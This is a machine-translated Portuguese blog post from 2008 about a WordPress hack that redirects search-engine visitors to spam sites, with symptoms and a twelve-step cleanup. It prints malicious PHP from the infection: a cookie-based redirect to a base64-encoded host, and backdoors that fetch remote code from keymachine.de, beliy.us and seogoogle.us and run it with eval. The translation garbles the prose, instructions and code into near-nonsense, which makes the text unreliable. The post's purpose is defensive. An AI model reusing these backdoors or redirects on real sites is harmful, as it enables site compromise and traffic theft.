WordPress Sendeiro: Recuperar e Afixar Google e Engenho de pesquisa ou N�o Biscoito Tr�fego Redirecionar a Seu-Needs.info, AnyResults.Net, �ureo-Info.net e Outro Ilegal S�tios

Picaretas est�o indo completamente a sendeiro e bravura WordPress blogs hospedaria por todo a Web, planta e inje��o malicioso c�digo em WordPress c�digo e banco de dados para redirecionar visitantes e sucessos de Google e outro engenhos de pesquisa a spam s�tios tal seu-needs.info, anyresults.net, �ureo-info.net, keymachine.de, beliy.us, seogoogle.us e muita outro spam s�tios que recheado com pagamento- por- clique CPC an�ncios. Algum sendeiro aparece a destino maior aflu�ncia by redirecionando tudo sem WordPress biscoito. Sem estado picareta, estes tr�fego suposto atingir �s blog como destino.

Sintomas da Engenho de pesquisa Redirecionamento Sendeiro

Nota que nem todas sintomas poder� acontecer ao todo. L� pode ser mais do que um m�todo de cortes exist�ncia, qual contribuir a diferente encontrando e poss�vel resolu��o.

• Qualquer clique atrav�s de engenhos de pesquisa tal Google, Yahoo, AOL, MSN, Janela Viva procura resultados, inculsivo blog nome, estar� redirecionar e despachante a picaretas’ s�tios tal seu-needs.info, anyresults.net, �ureo-info.net, keymachine.de, beliy.us, seogoogle.us, com a lista seguro crescer. Espectador chega �s picareta p�gina com a mesmo procura enfiar que ele ou ela costumava procura em engenho de pesquisa.
• Clique numa liga��o � blog em RSS alimentos leitor tal Google leitor pode ser redirecionar a picareta s�tio tamb�m.
• Uma visita sem quaisquer conta ao blog, ou n�o l�gica ( disso faz n�o possui biscoito detectar by malicioso c�digo), estar� redirecionar a spam s�tios.
• Somente visita de engenho de pesquisa s�o estado redirecionar embora, e o truque manejar a asno por volta provavelmente grande quantidade bloggers, webmasters e s�tio titulares, ou pelo menos alongamento a identifica��o da problema.
• R�pida grande e dram�tico pingo e lose de maci�o monta de visitantes tr�fego e p�gina vistas em teia c�o de ca�a estat�stica, especialmente tr�fego com Google como referida a, se bem que engenho de pesquisa resultados classifica��o � intacto.
• Macio pingo de anunciar proveito de Google AdSense ou outro an�ncios rede, ou afiliado comiss�es.
• A seguinte base cifrado PHP c�digo poder� aparecer ao wp-blog-header.php arquivo:

  <?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ como $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==falso){ $ser1=”?;brecha; }
se && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”);sa�da; }? >

• Uma imagem, qual � de fato um molho de malicioso PHP c�digo, foi adicionada � wp- conte�dos/ retirar uma mensagem no computador diret�rio. Por exemplo, wp- conte�dos/ retirar uma mensagem no computador/2008/06/06/abcdefghijklmn.jpg, ou pode ser dentro seu tema capa para encaderna��o, i.e. wp-contents/themes/classic/images/xyz.jpg. O nome da imagem pode ser na formato de xxxxxx_old.jpeg.
• Uma introdu��o foi embutido em MySQL banco de dados for WordPress wp_options para ativar a imagem ( o malicioso PHP c�digo) como um plugue, tipicamente como rss_f541b3abd05e7962fcab37737f40fad8.
• L� pode ser tamb�m malicioso c�digo, especialmente essas que interpretar com avaliar() ou base64_decode() comando estado embutido em outro WordPress PHP arquivos. Exemplos s�o os seguintes c�digos:

  ifisset_GET'p'(($[])) {
$coturno = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ coturno, ‘ obter http:/km20725.keymachine.de/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ coturno, ‘ hospedeiro: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ coturno));
$contente = implorar(”, $ contente);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ coturno);}
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ servidor/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}

  evalgzinflatebase64_decode(((

• WordPress tema isto � estado ativado e usado pode ser injetado com sendeiro c�digo e afetada tamb�m. Tal c�digo normalmente existe em header.php ou index.php da tema, e possui uma fila similar � abaixo

  ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

O WordPress procura tr�fego redirecionar a spam s�tio sendeiro acontecer provavelmente devido a seguran�a antro e vulnerabilidade que n�o seja remendado quando blog titular decidir para n�o o fazer atualiza��o a �ltima vers�o de WordPress ( embora algumrelat�rios que seu blogs estado picareta se bem que dela’ j� ao �ltima vers�o de WordPress 2.5.1). Qualquer que porqu�, heresia’ o conserto e solu��o para resolver e derrota o corte para garantir que you pr�prio atr�s os tr�ficos e evadir estado penalizar by Google by irracional redirecionando a spam p�ginas.

1. Refor�o o WordPress banco de dados.
2. Uso phpMyAdmin a folhear um livro WordPress MySQL tabelas de base de dados. Encaminhar-se wp_options mesa, e em seguida editar a linha nomeada active_plugins. A linha miudezas tudo ativo plugue que tem sido ativado. Atravessar a lista ( num linha), e procurar um um plugue nomeada ultimado com uma imagem extens�o, tal .jpg, .jpeg, .gif e etc. Por exemplo, abcdefgh_old.jpeg. Fichar o percurso � imagem arquivo.
3. Usando sFTP ou SSH ( desaprender por volta FTP ou Telnet for seguran�a), ent�o navegar � caminho do arquivo, e apagar o arquivo.
4. Encaminhar-se WordPress Administrador Plugue painel, desativar ou atirar qualquer plugue a claro desliga o malicioso plugue da “active_plugins” linha.
5. Atr�s a phpMyAdmin, �s wp_options mesa, arranjar um emprego linha que cont�m a seguinte enfiar como option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Apagar a linha embora.

   Se you dont’ conhecer como executar a base de dados limpeza especificado em passos acima, heresia’ um v�deo tutorial:

6. Encaminhar-se wp_users mesa. Se h� um an�nimo usu�rio ( nulo valor em user_nicename campina) cirada at 000000:: em 0000-00-00, fichar o usu�rio IDENTIFICA��O ( identifica��o campina, um n�mero). Apagar o usu�rio.
7. Folhear um livro o wp_usermeta mesa. Localizar tudo linhas com usu�rio f�sforos o IDENTIFICA��O da apagar ilegal usu�rio. Tem normalmente tr�s linhas estado aliado � invasor usu�rio Identifica��o. Apagar tudo o aliado linhas.
8. L�gica � servidor para editar o tema arquivos, ou folhear um livro o tema arquivos’ c�digo em Tema Editor de WordPress Administrador Desenho painel. Confirmar o header.php e index.php for qualquer suspeito c�digo. Como mencionada acima, procurar alguma coisa similar � linha abaixo:

   ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:

   Se encontrado, apagar e remover o c�digo. Repare que o malicioso c�digo estar� v�ria linhas longa em total.

9. Se dela’ n�o j� exist�ncia, criar um vazia index.html arquivo na wp- conte�dos/ plugue diret�rio. O vazia index.html couros os teores da plugue diret�rio, efetivamente protetor what plugue-ins estado usado de picaretas a empedernir e apertar o WordPress seguran�a.
10. Retirar uma mensagem no computador e substituir todos WordPress arquivos ( at� wp-blog-header.php) ao servidor com a fresca, limpeza, e original�ltima vers�o de WordPress (pois sim, exceto poucos arquivos tal wp-config.php e temas). Se seu’ aprimoramento, lido oguia cuidadosamente.
11. Altera��o seu senha.
12. Se tiver m�ltipla usu�rios, altera��o seu senha ( ou pedir as senhoras pedirem altera��o o c�digo secreto) tamb�m.

importante: Isto � um m�quina traduzida p�gina qual � fornecida " como �" sem garantia. M�quina tradu��o pode ser dif�cil comprender. Por favor recorrer aoriginal Ingl�s artigo sempre que poss�vel.

Parte e contribuir ou obter suporte t�cnico e ajuda at My Digital Vida F�runs.

Relacionado Artigos

• Adicionar NoFollow Relacionamento a WordPress Blogroll incrementar Mensageiro
• WordPress Plugue: Visualiza��o Google Anal�tica e FeedBurner Relat�rios Estat�stica de S�tio Admin
• Technorati Recebida Liga��es Plugue for WordPress
• Uma olhadela At Google Mercador Procura
• Como evitar, Desvio ou Escapada Google Caixa de areira
• Ask.com Engenho de pesquisa Cr�tica by CNNMoney
• Drive More Tr�fego usando Imagens
• SEO Amig�vel Rescrever M�todo deslocar Teias URL De Subdiret�rio a Ra�z Progenitor Capa para encaderna��o
• Integrar e visualizar Google AdSense for Procura e Co-Op H�bito Engenho de pesquisa Resulta em WordPress Blog P�gina Modelo
• Qual Engenho de pesquisa � o melhor e Muita Relevante?

Essa introdu��o foi despachado na ter�a-feira, Junho 10th, 2008 at 103: am e � arquivado sobWeblogs. Voc� pode acatar qualquer respostas para esta finalidade entrada ao longo do diaRSS 2.0 alimentos Voc� podepermiss�o uma resposta,ou trackback do seu pr�prio s�tio.